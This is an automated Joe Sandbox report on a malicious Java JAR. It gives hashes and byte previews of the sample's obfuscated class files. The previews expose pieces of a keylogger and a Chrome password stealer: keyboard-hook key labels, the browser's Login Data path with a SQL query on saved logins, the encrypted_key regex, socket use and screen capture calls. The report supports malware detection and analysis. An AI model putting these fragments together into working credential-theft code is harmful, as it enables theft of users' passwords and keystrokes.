                        No contacted IP infos

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1417504
                        Start date and time:2024-03-29 13:57:41 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 48s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsfilecookbook.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Without Tracing
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:MVO4879773357878.jar
                        Detection:MAL
                        Classification:mal92.troj.expl.winJAR@7/81@0/0
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 11
                        • Number of non-executed functions: 1
                        Cookbook Comments:
                        • Found application associated with file extension: .jar

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target java.exe, PID 1800 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtSetInformationFile calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp

                        Download File
                        Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):52
                        Entropy (8bit):4.690260390968384
                        Encrypted:false
                        SSDEEP:3:oFj4I5vpm4USN2:oJ5bE
                        MD5:36B845ABB096D2C5CEFEAB5C8DD2C27B
                        SHA1:72BE234CB4E546EC45513949555E1D15CF5A7217
                        SHA-256:92EF2EAB00A18DC9BA6D13B5AE8BDEDC9CA65C2ABB9E6A62E73E590F997DDA34
                        SHA-512:4A0FE449435B13AACE53D2DA715466BEBBE64C1B9AAB29E18CAA3C6BA1F7440F8DFB72A384BDC5911EC0493C724F05D9F09B7DB9A9344FAA0E7CD5ABCFEC00E6
                        Malicious:false
                        Reputation:low
                        Preview:C:\Program Files (x86)\Java\jre-1.8..1711717107083..

                        C:\Users\user\AppData\Local\Temp\hsperfdata_user\1800

                        Download File
                        Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):1.2900581267383067
                        Encrypted:false
                        SSDEEP:96:C+XLrch2B8GbwW4oSO6xCWf+UlKsxD657TgHG1bowt:C+X0g8GEW4o/6pcsEsHGd
                        MD5:5078F203FF6CCA9AF77BF78CF6E61FE9
                        SHA1:7AD13D28FBE95E8BD5DC9788D980F630224E37F7
                        SHA-256:BA28DB3D2C5011FD1B92B4CB474D21BA20D5DF8AE390AB45915CE35D13FDB4C2
                        SHA-512:2BB85F2B0DF0376DFCA0D8A08973E64381A52AE2EE8FEF1EEAFBAE20F8D2B62B099D5B1F0FB7CA23A5E265D156D1E6C7DBBC5D348923E87CBFE27780982AEDB3
                        Malicious:false
                        Reputation:low
                        Preview:........P9.......f...... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..).......@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

                        C:\jar\META-INF\MANIFEST.MF

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):410
                        Entropy (8bit):5.098341072037115
                        Encrypted:false
                        SSDEEP:6:1KItJtf9H3FpL64wuoaKgLQAw0ZEc+szM0ZEBhIl+szMnLQAXK8FUs5R4bPWMXlf:1Tt/fZbL6lWCL/BhIsvl5uWMX9
                        MD5:6F7AA6C9CC4FF1023229DAA3CF050B83
                        SHA1:F2BF9EE184DA208EADDE3C2D83A26E7456FCF71F
                        SHA-256:7B34819F527D1614282104A88336E1EA36841DED3890FF0FBBE08EECABE804E2
                        SHA-512:5F9E1BB45DFE5B147F9C68F733958F05E728DD1F5E0BD79282F97C173B2C6E79EEADC939C5832B9217B496B2727F4855DD8F677DBA0DB547AB8207AFD9CC8207
                        Malicious:false
                        Reputation:low
                        Preview:Manifest-Version: 1.0..Ant-Version: Apache Ant 1.9.7..Created-By: 1.8.0_381-b09 (Oracle Corporation)..Class-Path: lib/system-hook-3.5.jar lib/jna-5.5.0.jar lib/jna-platform.. -5.5.0.jar lib/sqlite-jdbc-3.14.2.1.jar lib/jna-5.5.0.jar lib/jna-pla.. tform-5.5.0.jar lib/sqlite-jdbc-3.14.2.1.jar lib/system-hook-3.5.jar..X-COMMENT: Main-Class will be added automatically by build..Main-Class: carLambo.FirstRun....

                        C:\jar\carLambo\AILeJFODIHNyHULMHPDMqXVIZVnaVD.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6300
                        Entropy (8bit):5.933785243555052
                        Encrypted:false
                        SSDEEP:96:LPCq0JQriL88vDpvFClZjA5JblbLbkOD6/SCpUNq55lCccEjx:LPCq0JQr8LldIa5rbP36/Bt553N
                        MD5:62B73F4EFA85ACB6CF0DD05675001D65
                        SHA1:9C80C3EC15FB2C0A09000435F12F27479190867B
                        SHA-256:F3280DB497878DD9045C81012E06DC73E788B8FD8D3337CF4B08CAAC672147FA
                        SHA-512:FAE76F267D4923A273522E6128C5F0E717B840479B7DAA095513F28ACECDCF4CF14CADE9EDF5CC4EB5DBF827D4ECE24BC70F9908CAD907341D705316F3670351
                        Malicious:false
                        Reputation:low
                        Preview:.......4..........................................................................................................................................n....x....|....n....w..(.d....l....t....{...._....^....]....m....f....}....j..............r.. .]..!.y..".z..#.]..$.c..$.g..$.h..$.i..$.o..$.u..$.~..$....$....$....$....$....$....%.]..%.a..%.e..%....&.`..&....'.b..'.f..'.p..'.s..).q..).v....k........................................................................................................................................................................................................................................... ...()Ljava/io/InputStream;...()Ljava/io/OutputStream;...()Ljava/lang/String;...()V...()[B...(I)Ljava/lang/String;...(II)Ljava/lang/String;..,(LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;)V..](LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;Ljava/net/Socket;LcarLambo/iWGSWxRnUlPNEVGNllqlF;)V..)(Ljava/io/InputStream;)Ljava/lang/String;...(Ljava/lang/CharSequence;)Z..D(Ljava/lang/CharSeq

                        C:\jar\carLambo\ANLvCFyChcJzVnLHSqeekHx.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):430
                        Entropy (8bit):5.559054251801829
                        Encrypted:false
                        SSDEEP:12:svUI2NyEhy1zylIHYWyJQnxaJtRloT/YuPkM50:SUI2gEhy1esyJqQHzoTAFM50
                        MD5:3A455E33E1B038A2EB27E634E94DC263
                        SHA1:32851EF71D940E9AE3C33491642EACC7ACAD3C35
                        SHA-256:E86A6B04AFC2D5C002A634B419B5E87445ABDDE4C157FB9F464CBAAE9B632C02
                        SHA-512:6C6C3F964737FF4295805BAB7D324C5AB9B24A2199DAA0E00F0C6351C5293910DF3BCC82F9438CE45A9891E0F320C06E62B0496B12F9160F815A377415C6CE9E
                        Malicious:false
                        Reputation:low
                        Preview:.......4...............................................()V..+(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;)V...<init>...Code..(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;.. carLambo/ANLvCFyChcJzVnLHSqeekHx..&carLambo/XfrcwHiEekkBljrjyatNOjRICOGWh...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\AimdQBqtwmRlTmfOwmvjwNywPJZsM.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1215
                        Entropy (8bit):5.846385683550119
                        Encrypted:false
                        SSDEEP:24:yNYwMnaf4UpXny1t9ei8zt1VFei8WzdQ3z5TqUDDvp+6O/:Hw0UIwB1yKQ3z5TjPE6+
                        MD5:492B0AF96C2BAF980CD3A09CC47615C6
                        SHA1:D35C4F5DDD3CF4BBF9FF61B6335AA7F4575BF6EB
                        SHA-256:9A61438052DCEE8964F27AE91722C83150DE1045E9CAD81038793045D8260966
                        SHA-512:3CCF947A9D42D6C27C12C3BFE2AF3295163075019E21470BD4578D9301026B9BD9FE3A06F0DD4D6B1EC5B386748D7710C72ACFD73F5834A5683343F6D6055C3E
                        Malicious:false
                        Preview:.......4.M..(..5..<..=..>..?..C..D..E..F..G..H.........$.... ....#.........'.........!....&..............%........."..3.+..3.1..;.0..@./..@.8..@.9..A.,..B.)..I.6..I.7..J.*..K.-..L.2..........()Ljava/io/OutputStream;...()Ljava/lang/String;...()V...()[B...(I)Ljava/lang/String;..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..X(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/net/Socket;LcarLambo/SjomlJrGISDYNqiAAulMONOv;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;I)V...([B)V...<init>...Code...HRDP-SOC:...I..(LcarLambo/AimdQBqtwmRlTmfOwmvjwNywPJZsM;..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...Ljava/lang/String;...StackMapTable...append..&carLambo/AimdQBqtwmRlTmfOwmvjwNywPJZsM...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..!carLambo/SjomlJrGISDYNqiAAulMONOv...carLambo/rCYbIngZMxCXvVYABulZ...gQEuyVcYntwPXTysEtfquh...getBytes...getOutputStream...java/io/OutputStream...java/lang/Exception...java/lang/Object...java/lang/String...java/lang/StringBuilder...java/net/Socket...nnHRYoAONroTDXAkGOnAtRE...toSt

                        C:\jar\carLambo\BAvsXDspdJYXQBvXhSPZNfejgtqGP.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):562
                        Entropy (8bit):5.6361079950340995
                        Encrypted:false
                        SSDEEP:12:QiWzz6TMOgMBMRMrzLG/MOFlkW58S0FnxaJtRRiMbU+rJQljkltd+lo4Y4S8t:QZ6X3GhlkWGZQHvUX6sBY4S8t
                        MD5:5152A6BD148B6700B12A992DCBB55982
                        SHA1:1F16CB86F87582F4981444B92C9A0B7E68FF49CD
                        SHA-256:9D4E9A2F085B4D2FB6922C96E594F478B840F5B51A540FCC28E0A940572448F5
                        SHA-512:B573D79A6CB4780AD443E6975DE9FF95A513D7428FF548A90B3ABBECBD926E2B169681EEB19A1803C55EF805C4D747F80A1EDAA073B7D7444163E2DBA831A74D
                        Malicious:false
                        Preview:.......4.%..............!.."............................................... ....#....$.....()Ljava/lang/String;...()V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...<clinit>...<init>...C:\Users\...Code...Ljava/lang/String;...\AppData...append..&carLambo/BAvsXDspdJYXQBvXhSPZNfejgtqGP..$carLambo/toANhLheFpVIBJATjkPJUTCvbMu...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/StringBuilder...nnHRYoAONroTDXAkGOnAtRE...toString.1........... ............................*.....................'...........Y.............................

                        C:\jar\carLambo\CHHXGzeSpzwiJOAtZoSZBJ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):10718
                        Entropy (8bit):6.196638428730907
                        Encrypted:false
                        SSDEEP:192:fS8oWJ7qqWo87rBRrAseXzhxy/LuuR+42VAs+rl:fS8oAWrf7rHrAseXzXyzuuR+xVh+x
                        MD5:BD1B10A14E93DAB67D68AB2C58E74013
                        SHA1:A3E8C210DEC85574202E835CC7F32D01002BE557
                        SHA-256:2B696DCE308AB53F537AF6B3ECEB1C52FF8983EED1334BFFAE595F205E5264CB
                        SHA-512:2D7106B360554A6E015BDED0B11006FA665FB62B9C03517599E82FB676FFBD9B9BA31105B8AF0124C5E307BEF93DAF474764B013D5C20ACEDB916978F6ED049C
                        Malicious:false
                        Preview:.......4......................C..D..E..F..I..J..K..M..O..P..Q..R..S..T..U..X..Y..Z..[..\..b..c..d..k..l..m..n..o..p..q..........................j..u..v..w..x..y..z..{..|..}..~.....................................................................................H.../..../..../..../..../..../....7....7....8....8....8....8....:....;....;....>....P........./..../..../..../..../..../..../..../..../....0....0....0....1....2....2....2....2....2....3....4....4....4....4....4....4....4....4....6....7....9....9....<....=....=....=....>....>....>....>....?....?....?....@....@....@....B....C....C....D....E....E....F....G....G....G....G....G....G....G....G....G....G....G....G....H....H....H....H....I....I....J....J....J....J....K....K....L....O....O....Q....Q....5....M....M....N....N....N....N....H. ..H.'..H.(..H.*..H....H.2..H.7..H.9..H.A..L....V.7..V.`..V.i..e. ..f.a..r.1..s.7..s.`..t.5.... ..../....8....1....!.... ......... ....,....7....:....;....<....=....B....]....`....$....".........6........

                        C:\jar\carLambo\CHHXGzeSpzwiJOAtZoSZBJOdYDRcQU.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3221
                        Entropy (8bit):5.688218794925527
                        Encrypted:false
                        SSDEEP:48:SguLrLiV+rp+KuccHp+ETUTQ9SuyBFtNc73jNszo/a3R3oFGaB:DaMeqMFM7432Is
                        MD5:394FC20B3017D52C7BCD64A34D07A40C
                        SHA1:1764C5351FFC53F164466CDC034B643A6513869C
                        SHA-256:38C1F74CB89A89D595E87AA40DB3E953C16CBA00BCAAC6B7BE0BE9B15EE34392
                        SHA-512:7CA8B2BA41A7D3F99F87EF3E83F49B6E7B0203827DE13FBA5C7584E732BF610151F4F555DF20A89BFE566BD7D43C2956FECB7C46F89AFBE9DBFC7CF47E2D36EF
                        Malicious:false
                        Preview:.......4.p..B..C..D..E..F..G..H..I..J..K..L..M..N..O..P..Q..R..S..T..U..V..W..X..Y..Z..[..\..]..^.._..`..a..b..c..d..j..m..n..".1..#.0..$.6..%./..&.2..&.3..&.4..&.5..>.9..e.<..e.A..f.7..g.8..h.:..i.:..o.;...()C...()I...()V...()Z...(C)Ljava/lang/String;...(Ljava/lang/String;)V..0(Llc/kra/system/keyboard/event/GlobalKeyEvent;)V...<init>...Code...StackMapTable...Z...[Back]...[Ctrl-A]...[Ctrl-B]...[Ctrl-C]...[Ctrl-D]...[Ctrl-E]...[Ctrl-F]...[Ctrl-G]...[Ctrl-H]...[Ctrl-I]...[Ctrl-J]...[Ctrl-K]...[Ctrl-L]...[Ctrl-M]...[Ctrl-N]...[Ctrl-O]...[Ctrl-P]...[Ctrl-Q]...[Ctrl-R]...[Ctrl-S]...[Ctrl-T]...[Ctrl-U]...[Ctrl-V]...[Ctrl-W]...[Ctrl-X]...[Ctrl-Y]...[Ctrl-Z]...[DOWN]...[ENTER]...[LEFT]...[RIGHT]...[UP]...[esc]..'carLambo/CHHXGzeSpzwiJOAtZoSZBJOdYDRcQU..!carLambo/cUFMRzrqZzmkSJziceHSMVGQ...gQEuyVcYntwPXTysEtfquh...getKeyChar...getVirtualKeyCode...isControlPressed...isShiftPressed...java/lang/String...keyPressed...keyReleased..-lc/kra/system/keyboard/event/GlobalKeyAdapter..+lc/kra/system/keyboa

                        C:\jar\carLambo\CMGnAzOSNTsjXgAokPsrvtqOAexQi.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2712
                        Entropy (8bit):5.635937729097937
                        Encrypted:false
                        SSDEEP:48:MnFoS+u6HGId0CSJQrNbzDcDAAbMF3G3vSHi5F4a+KmE6K7J7:MuS+hGIeJ45OMF3wFs0
                        MD5:31476A8732061CFFA154BAB1A8A134C7
                        SHA1:9EAD48E11BBB7942D236FE262E959D84528D7582
                        SHA-256:F7734385823230AC7B733FE0260C380A18594F53232006F803B27959E5CAF959
                        SHA-512:32B2C84417A0CB555DF2383B3F49B3D9C1D05011CC3141CB062F63005323664CF4D615297079B8A952019807600B70B05AA5539514EACF449673C323504E41EB
                        Malicious:false
                        Preview:.......4....\..].._..f..g..h..i..j..k..l..m..n..o..p..q..r..s..t....0....9....>....,....?....-....:....;....<....+....@....+....+....2....7..../....6....3....8.........1....5....=....4..W.F..W.I..W.R..^.L..`.Q..a.Z..b.K..c.H..d.G..e.C..u.E..v.J..w.G..x.A..y.Z..z.N..{.O..|.P..}.M..~.Y....B....B...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/List;...()Ljava/util/Set;...()V...()Z...(I)Ljava/lang/String;...(Ljava/io/Reader;)V..3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;..&(Ljava/lang/Object;)Ljava/lang/Object;...(Ljava/lang/Object;)Z..8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;...(Ljava/lang/String;)D...(Ljava/lang/String;)F...(Ljava/lang/String;)I..-(Ljava/lang/String;)Ljava/util/regex/Pattern;...(Ljava/lang/String;)V..((Ljava/lang/String;Ljava/lang/String;D)D..((Ljava/lang/String;Ljava/lang/String;F)F..((Ljava/lang/String;Ljava/lang/String;I)I..J(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;...<init

                        C:\jar\carLambo\CVahPcpwAqEGgjZCgeRHqvzav.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):149
                        Entropy (8bit):4.799145086010896
                        Encrypted:false
                        SSDEEP:3:DbllJJ25lgklYlM4REmKDEEXq6AoGp8CHmCf6QCK8PMklclklGlulskll65UX/:BsYW4y1tcDp8ZCf6RPk+o8vlo5U/
                        MD5:A69B525DBF79DDF76ED42ADAE1707137
                        SHA1:24146068576B4AFCCE7898D1A0ED395733AE3F8A
                        SHA-256:A5882F05DFF91B760F3E192DA4C221664F93077092BBF4F3F154A950558FB142
                        SHA-512:C311C2297A622AD39BEE846394B606557CAD8DC9FB70583FD14A6FEC8B16E2CEE6CA33EB06B71C957D549D67F60F47D725E0BBDFCEC2C6F9DD896B508AED50E7
                        Malicious:false
                        Preview:.......4.....................()V...<init>...Code.."carLambo/CVahPcpwAqEGgjZCgeRHqvzav...java/lang/Object.1................................*..........

                        C:\jar\carLambo\DPSFZBMQYgMSdqRKnSjeeHqvknUN.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):622
                        Entropy (8bit):5.779903624407434
                        Encrypted:false
                        SSDEEP:12:k7l77cvIP68kGdMhy1I8kGc2qG8kGNa0nIVLnxaJtRloOOul6zDdY:k7BcAPQy1JqBaKIVTQHzoa6z2
                        MD5:25A7727CBAEE58907791AD4C375475B0
                        SHA1:02821EF7A214C794A155E24D41244E28E371DCDE
                        SHA-256:3E4B7150E449D3FD3D798875E718162D628A079EB04A06C43F5003571DC09C03
                        SHA-512:24661CFA0592F03C915C5452F8F579CBB492E4C7D8644AF51B9886DB5DC0631293920E3BF1AE8C81BAD3AC443C1EDD280E16CF939104AB7948C7C283990BE774
                        Malicious:false
                        Preview:.......4...................................................................()V..](LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;Ljava/net/Socket;LcarLambo/iWGSWxRnUlPNEVGNllqlF;)V...<init>...Code..)LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;.. LcarLambo/iWGSWxRnUlPNEVGNllqlF;...Ljava/net/Socket;..'carLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD..%carLambo/DPSFZBMQYgMSdqRKnSjeeHqvknUN...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...run.0................................................. ........*+...*,...*-...*..............................*...*...*.............

                        C:\jar\carLambo\DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1775
                        Entropy (8bit):5.92778080882633
                        Encrypted:false
                        SSDEEP:24:uGp8Cmy1G1WSQy/0FxOlYoGHz5eqjPefalkTl81lklzC3Ww1zb5jV2+:1Sv15Qy/Xkz5esea2O1KoTNc+
                        MD5:F3F714703823DD6CD1BBF6EE8C26F4E4
                        SHA1:F4C6EAB310A13B5108FA3ED1B968FC0CCC28563E
                        SHA-256:3D582DE73B213C65829EF7AB4C0C5A35022561C0BD4935855E6629113FE85AEE
                        SHA-512:80E019B7D6AB9502366D994C53C5948AF9EBE218588B5BBF5E68949BD330BB4B6B39BFB8975F2A2402120586D717ADA73E4F04DFFBB8BA6397B8BBC8EE804E66
                        Malicious:false
                        Preview:.......4.M..>..?..@..A..F..G..J..K..5..8..9..:..B..C..D..E....#....%....&...."..............!....$.............. ....'..1.)..1./..1.0..7....;.*..<.-..<.5..=.(..H.6..I.3..L.(...()Ljava/lang/String;...()V...()Z...()[Ljava/io/File;..+(LcarLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT;)V...(Ljava/io/File;Ljava/io/File;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...([Ljava/lang/String;)V...<init>...Code...Ljava/lang/String;...StackMapTable...[Ljava/io/File;...[Ljava/lang/String;...append..&carLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT..$carLambo/hSQNXYaWyFQzecPOHvVddvqXyqC.. carLambo/qvNsplybcQmnatGjnQTThBZ...exists...gQEuyVcYntwPXTysEtfquh...getAbsolutePath..Qhttps://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar..Yhttps://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar..Ghttps://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar..Whttps://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdb

                        C:\jar\carLambo\ETIKYbEhuMLgDjIJSHDmGnlmeMsm.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1442
                        Entropy (8bit):5.919841242525247
                        Encrypted:false
                        SSDEEP:24:6KSdm438awgKencXCpZaNKk88Kk20JlZlkWKDSUQFQqQfrz5z6AQIktnOV0Q0OL:Jr43+gkCpZLkkk20JlfNLBQDz5z6lIkI
                        MD5:C993C9A0057B12C92FFCC66CE893D24D
                        SHA1:44F1AC052B127E4D6686C1B85E5AD4AC7A540383
                        SHA-256:2EB3622BCAA23D8F82F0C41A530E390D4006877569CC0D496F74C649C07022DF
                        SHA-512:23B6CCC72905D573BE3D24788827D0AE3D5BD0296C8DF278A2E10292BA48CDA6F3B562042B20DE4F45A3765BCD04B363C5ECA1616A0D0001AADF7596EF9CC7F3
                        Malicious:false
                        Preview:.......4.U..0..7..8..=..>..?..@..A..B..C..F..G..H..M..N..O....(....#....$....%....(....)....*....+....,....-.........(...."....'...."....&..../..6.2..:.<..;.<..D.<..E.3..I.4..J.<..K.<..L.<..P.<..Q.<..R.<..S.<..T.1..."encrypted_key":"([^,]*)"...()Ljava/lang/String;...()V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;...<clinit>...<init>...AES/GCM/NoPadding...Chrome Not Installed...Code...GYDTPVEwzYqRTvxmvHtRLJG...GeLuFwhdbiiEVoEeoUbtXxPX...Ljava/lang/String;...No passwords Found...SELECT * FROM logins;..$URL:%s..Username:%s..Password:%s.......Unable to decode..!Your OS (%s) is not supported! :(..1\Local\Google\Chrome\User Data\Default\Login Data..*\Local\Google\Chrome\User Data\Local State...akllnBiTjwPmAwfMbajsTFm...append..&carLambo/BAvsXDspdJYXQBvXhSPZNfejgtqGP..%carLambo/ETIKYbEhuMLgDjIJSHDmGnlmeMsm..$carLambo/toANhLheFpVIBJATjkPJUTCvbMu...format...gQEuyVcYntwPXTysEtfquh...gcLmiwpDoXkEofFgIgnkAFbECjBM...ghKDbwZCNsgFCyEcTHO

                        C:\jar\carLambo\FirstRun.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3885
                        Entropy (8bit):6.084158537403049
                        Encrypted:false
                        SSDEEP:48:p70YecucJGhH1X0QZQk5DfFuLLNvKb3ly1U/R3PyxWo723g+y/D4fpxV:+Yetr0QZYZ8tBy7SfpP
                        MD5:0AEE0C9A17657BEDFF1AA72A972F919A
                        SHA1:4D085652A8A86385FBDC967821352C11D7607B20
                        SHA-256:B9F133AABA353AE066A88DB4E96590B0476AD21082517B407723BB6474C67189
                        SHA-512:2B1105D11E63276B7AC2FC38CEED7FCBE6737B72F35CFBCC499446F6339FDE774B034CF82918F796755620B05E8427BD9DD9C16B33A4FCC5B5135414990DC0D3
                        Malicious:false
                        Preview:.......4.........................................................................................................l....]....j....z.........j....z.........m....y....k....r....s....x....... .{....Z....e.........[....d....h....u....w.........Y....d.........\....f....Y....g....i....n....Z....c....v....Z....a....o....p....t....~....}....|....`....q...._....Y....Z....^....... .b.. ....!......................................................................................................................................................................................................................................"...()Ljava/lang/Runtime;...()Ljava/lang/String;...()V...()Z...()[Ljava/lang/String;...(I)V..+(LcarLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT;)V..>(LcarLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT;[Ljava/lang/String;)V..%(LcarLambo/TgBoQLFFtKbHGgBZrVBiDrm;)V..)(Ljava/awt/Component;Ljava/lang/Object;)V...(Ljava/io/File;Ljava/io/File;)V...(Ljava/lang/Object;)Z...(Ljava/lang/String;)I..'(Ljava/lang/Strin

                        C:\jar\carLambo\GDI32.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):254
                        Entropy (8bit):5.154915202643433
                        Encrypted:false
                        SSDEEP:6:yGbUwCvWpsnIUwCvWpYIUwCvWOMh5358UwCmbRPYklKrl:jAwCvWYwCvWOwCvWz95rwCgR2rl
                        MD5:3A5C3EB8DCAA9F6E6F590D8C93022175
                        SHA1:9A0C41BCC127FD94F16257ED86B8FF9DA7B50941
                        SHA-256:2C662614F62F6643F5BB277ACA7D5A320910494FE909D0480D2C55E86BBD5C07
                        SHA-512:C2B90E9890F6CB66109E09DF042F30B3946555DDE5A2A501DD25FE595C782244A2E476C2D46C315DE688EAEEA167A24CBA64C77FE1609B976209E21248C65F88
                        Malicious:false
                        Preview:.......4..............(Lcom/sun/jna/platform/win32/WinDef$HDC;IIIILcom/sun/jna/platform/win32/WinDef$HDC;IILcom/sun/jna/platform/win32/WinDef$DWORD;)Z...BitBlt...carLambo/GDI32.. com/sun/jna/platform/win32/GDI32...java/lang/Object........................

                        C:\jar\carLambo\GYDTPVEwzYqRTvxmvHtRLJG.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4501
                        Entropy (8bit):6.006768237470638
                        Encrypted:false
                        SSDEEP:96:iKT73vos5jDt+cBMsgAyE0VojzKSlbzLBy0:iKTT5YcBMcfJllbXR
                        MD5:CC7E6480ED4B022F20694154B2529572
                        SHA1:DD020897342C67E0525BF0D3D9BAFBFCE1148844
                        SHA-256:73B44B4C039F894A0CD1E7B62C60FB4001E6813FFABE4AEC8D5431EB8FB65B0A
                        SHA-512:3B4269DD6F7FD09D7FE7581FF3EF703DB87129FF11FA6DF8E76D585361827984DD60441B0C82207587A2AF1433DE468E0068AC3147B944726BE0B4238C8937BD
                        Malicious:false
